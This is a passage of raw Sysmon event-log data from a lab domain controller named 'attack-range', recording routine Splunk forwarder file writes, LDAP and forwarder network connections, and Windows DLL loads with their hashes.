Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3C2D91B3F046262CEA042147DD622FC,SHA256=462F0A6E70A9B24A7D695BB4CD7AA304587777001EA018DDC0CE22840617BF41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:34.193{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4564B205FF212E05680634DF8BB41C0B,SHA256=E3146C6A23BB8D4D4934768C4EF63B0143563B1B3737074AFC4F9E96B4C798A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:35.286{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7196D1418C109F5D39E6AE523D41DBB9,SHA256=BEA3FB1E76B74DC9D849F393F8BE91A57EB862FE9F20A11949BB141984A2A4C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:30.151{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53345-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x800000000000000099951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:30.151{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53345-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local389ldap 23542300x800000000000000099954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:36.380{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23C2C2BDC7BB0AAF7D7183AB88710040,SHA256=3005BF1FAFD20B2121C6AA364C238251AD53230D475EEAD6DE49BF1D81ACFC0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:34.152{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53346-false10.0.1.12-8000- 23542300x800000000000000099955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:37.490{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5E90EBBE72D4F9B895F38A7101BEF18,SHA256=9B2533F8D5AE14079B02ECE3EC1CA88CBB0FD65B1510FDB582CA65923F94042C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:38.583{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0303742B6C9F0E8DC2A8E7176E0178F5,SHA256=A5B5408CF79AA135CF7C41A9D410A42B44CBA3EF890F66DB7630180FCCF0B657,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:39.677{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C3BED97B13D66F8E3036C36D3DA9349,SHA256=82B8A016A3106246AEF3AC383598674D2F287627C2968002F63392D6FFE4C2B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:40.771{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACB720305BC7A401F9791328BB8537EC,SHA256=CFC4B34C6F409D6D6744A2E17C74ABC340FA507F8C55B43EF1B087D84B1AA33A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:41.865{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=522CD01F1FEED46A644A34F448B74471,SHA256=E80010D42C526389B3A8F3AC564F9FA5667E22C36B3B6732C6E2C16138D09285,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:42.958{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51899A3EEA6B197F5C911A2AFF3B801C,SHA256=AE52ACE45AC2ACF0401F325B7020BB16DABD1EB16D4E073062F71CC709211667,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:43.536{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8CE33A3E362669370761528B29FFF1D,SHA256=8B2E1E80481C84A399539FC5F3F3E3DE3A105FB8C200DF87784C7B4B29CDDDF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:44.837{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\respondent-20220530105428-127MD5=3A7897B317CA03B79FE07533175F9643,SHA256=F76FF17815B8F96571634A983322FD544389A7130FC207258DDFB92658757A4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:40.417{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53348-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x800000000000000099965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:40.417{326FD73D-A262-6294-2300-000000005502}2720C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53348-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x800000000000000099964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:40.120{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53347-false10.0.1.12-8000- 23542300x800000000000000099963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:44.052{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5F0630E9A846E490B2A887F43C6A694,SHA256=14A522164AED67B8AA6AB1EC02F7B38F8F8802789F73BE1F686A278A2F545492,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.894{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.894{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.894{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.894{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.894{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.894{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.894{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.894{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000099999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000099996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 